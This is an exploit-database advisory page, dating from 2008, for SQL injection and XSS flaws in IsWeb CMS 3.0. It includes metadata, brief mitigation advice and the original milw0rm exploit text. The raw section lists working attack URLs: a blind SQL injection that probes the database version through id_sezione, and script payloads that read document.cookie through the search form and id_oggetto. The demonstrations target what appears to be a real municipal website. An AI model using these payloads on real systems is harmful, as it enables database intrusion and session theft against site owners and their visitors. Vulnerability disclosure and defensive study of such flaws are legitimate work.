IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities

vendor:

IsWeb CMS

by:

XaDoS (SecurityCode Team)

7.5

CVSS

HIGH

Blind $qL Injection and XSS

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: IsWeb CMS

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:cmsisweb:isweb_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities

IsWeb CMS v 3.0 is vulnerable to Blind $qL Injection and XSS. An attacker can inject malicious SQL queries in the vulnerable parameter 'id_sezione' and execute arbitrary SQL commands in the database. An attacker can also inject malicious JavaScript code in the vulnerable parameter 'azione' and 'id_doc' and execute arbitrary JavaScript code in the victim's browser.

Mitigation:

Input validation should be used to prevent SQL Injection and XSS attacks. Sanitize user input and escape special characters.

Source

Exploit-DB raw data:

[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> BÂ§g: Blind $ql inJection
> SIte vuln: http://www.cmsisweb.it

>---------------------------------------<
 
 
[â– ] BlinD $qL:
 
|: http://www.example.com/index.php?id_sezione=[$qL] 

> DeM0:
 
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
 
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
 
 
[â– ] XSS: 
 
|: http://www.comune.avezzano.aq.it/index.php?azione=cerca  
  In this modul (search) write:
 
  "><script>alert(document.cookie)</script> 
 
or another vuln Page:
 
|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
 
[â– ] Th4nKs::
 
\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</

# milw0rm.com [2008-12-14]